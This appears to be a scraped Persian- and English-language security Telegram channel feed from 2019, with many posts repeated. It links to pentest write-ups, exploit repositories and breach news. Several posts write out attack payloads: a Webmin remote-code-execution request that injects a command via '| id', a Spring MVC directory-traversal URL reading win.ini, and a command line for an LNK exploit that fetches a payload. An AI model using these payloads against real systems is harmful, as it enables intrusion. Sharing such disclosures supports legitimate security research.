Automating local DTD discovery for XXE exploitation
https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation
#xxe
#web
#pentest
@sec_nerd
https://www.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation
#xxe
#web
#pentest
@sec_nerd
A Deep Dive into XXE Injection
https://www.synack.com/blog/a-deep-dive-into-xxe-injection/
#xxe
#web
#pentest
@sec_nerd
https://www.synack.com/blog/a-deep-dive-into-xxe-injection/
#xxe
#web
#pentest
@sec_nerd
CVE-2019–13382: Local Privilege Escalation in SnagIt
https://posts.specterops.io/cve-2019-13382-local-privilege-escalation-in-snagit-abe5f31c349
#windows
#pentest
#privesc
@sec_nerd
https://posts.specterops.io/cve-2019-13382-local-privilege-escalation-in-snagit-abe5f31c349
#windows
#pentest
#privesc
@sec_nerd
LNK Exploit
https://github.com/mortychannel/lnkexploit
نحوه اجرا:
python lnk.py -p download -l https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe -s payload.exe -i 1
POC:
https://youtu.be/AWGL28Qk4bA
#windows
#pentest
#exploit
@sec_nerd
https://github.com/mortychannel/lnkexploit
نحوه اجرا:
python lnk.py -p download -l https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe -s payload.exe -i 1
POC:
https://youtu.be/AWGL28Qk4bA
#windows
#pentest
#exploit
@sec_nerd
GitHub
GitHub - mortychannel/lnkexploit
Contribute to mortychannel/lnkexploit development by creating an account on GitHub.
[PoC] Analysis of Spring MVC Directory Traversal Vulnerability (CVE-2018-1271)
https://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
(link: https://paper.seebug.org/991/) paper.seebug.org/991/
#exploit
#Poc
@sec_nerd
https://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
(link: https://paper.seebug.org/991/) paper.seebug.org/991/
#exploit
#Poc
@sec_nerd
PowerShell: Get Last Domain Logon with Get-ADUserLastLogon
https://sid-500.com/2019/08/12/powershell-get-last-domain-logon-with-get-aduserlastlogon/
#windows
#ps
#security
@sec_nerd
https://sid-500.com/2019/08/12/powershell-get-last-domain-logon-with-get-aduserlastlogon/
#windows
#ps
#security
@sec_nerd
اساسیات حمله به زیردامنه وب سایتهای بزرگ
https://blog.cystack.net/subdomain-takeover/
https://blog.cystack.net/subdomain-takeover-chapter-two-azure-services/
#web
#pentest
#bugbounty
#subdomain
@sec_nerd
https://blog.cystack.net/subdomain-takeover/
https://blog.cystack.net/subdomain-takeover-chapter-two-azure-services/
#web
#pentest
#bugbounty
#subdomain
@sec_nerd
CyStack Security Blog
Subdomain takeover - Chapter one: Methodology
Subdomain takeover is a high severity vulnerability that can be exploited to
take control of a domain and pointing it to an address managed by attackers.
Attacks on this vulnerability are often used for the purpose of creating
phishing sites, spreading malwares.…
take control of a domain and pointing it to an address managed by attackers.
Attacks on this vulnerability are often used for the purpose of creating
phishing sites, spreading malwares.…
"Webmin 0day remote code execution"
PoC:
/password_reset.cgi
user=root&pam&expired&old=wrong | id
https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
#webmin
#exploit
#rce
@sec_nerd
PoC:
/password_reset.cgi
user=root&pam&expired&old=wrong | id
https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html
#webmin
#exploit
#rce
@sec_nerd
راهکارهای جایگزین برای دستیابی به سطح دسترسی SYSTEM در ویندوز
https://blog.xpnsec.com/becoming-system/
#windows
#privesc
#pentest
@sec_nerd
https://blog.xpnsec.com/becoming-system/
#windows
#privesc
#pentest
@sec_nerd
Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708
https://github.com/dorkerdevil/Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708-
#windows
#rdp
#rce
@sec_nerd
https://github.com/dorkerdevil/Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708-
#windows
#rdp
#rce
@sec_nerd
GitHub
GitHub - dorkerdevil/Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708-: rce exploit , made to work with…
rce exploit , made to work with pocsuite3. Contribute to dorkerdevil/Remote-Desktop-Services-Remote-Code-Execution-Vulnerability-CVE-2019-0708- development by creating an account on GitHub.
امنیت اطلاعات
"Webmin 0day remote code execution" PoC: /password_reset.cgi user=root&pam&expired&old=wrong | id https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html #webmin #exploit #rce @sec_nerd
نتایج یک مطالعه در گوگل نشان میدهد 1.5 درصد لاگین های انجام شده در فضای وب در معرض خطر انتشار در حملات هکرها هستند.
این تحقیق نشان میدهد بیشترین خطر متوجه وبسایتهای تجاری، سرویس های ایمیل و پیام رسان و شبکه های اجتماعی می باشد.
https://www.bleepingcomputer.com/news/security/google-estimates-15-percent-of-web-logins-exposed-in-data-breaches/
#google
#news
#privacy
@sec_nerd
این تحقیق نشان میدهد بیشترین خطر متوجه وبسایتهای تجاری، سرویس های ایمیل و پیام رسان و شبکه های اجتماعی می باشد.
https://www.bleepingcomputer.com/news/security/google-estimates-15-percent-of-web-logins-exposed-in-data-breaches/
#news
#privacy
@sec_nerd
BleepingComputer
Google Estimates 1.5% of Web Logins Exposed in Data Breaches
A study released by Google estimates that a 1.5% of all logins used across the web are vulnerable to credential stuffing attacks due to being disclosed in data breaches. While this percentage is quite small, when you take into consideration the total of amount…
امنیت اطلاعات
"Webmin 0day remote code execution" PoC: /password_reset.cgi user=root&pam&expired&old=wrong | id https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html #webmin #exploit #rce @sec_nerd
Exploit Database
Webmin 1.920 - Remote Code Execution
Webmin 1.920 - Remote Code Execution. CVE-2019-15107 . webapps exploit for Linux platform
Breaking Into Your Company's Internal Network - SuiteCRM 7.11.4
https://blog.ripstech.com/2019/breaking-into-your-internal-network/
#writeup
#pentest
#web
@sec_nerd
https://blog.ripstech.com/2019/breaking-into-your-internal-network/
#writeup
#pentest
#web
@sec_nerd
حمله باج افزاری به ۲۲ اداره دولتی در تگزاس و درخواست ۲.۵ میلیون دلار باج از سوی عاملان این حمله!
https://www.databreachtoday.com/texas-says-22-local-government-agencies-hit-by-ransomware-a-12937
#news
#ransome
#usa
@sec_nerd
https://www.databreachtoday.com/texas-says-22-local-government-agencies-hit-by-ransomware-a-12937
#news
#ransome
#usa
@sec_nerd
Databreachtoday
Texas Says 22 Local Government Agencies Hit by Ransomware
Ransomware-wielding attackers continue to target not just big businesses and large government agencies, but increasingly their smaller counterparts too. In Texas,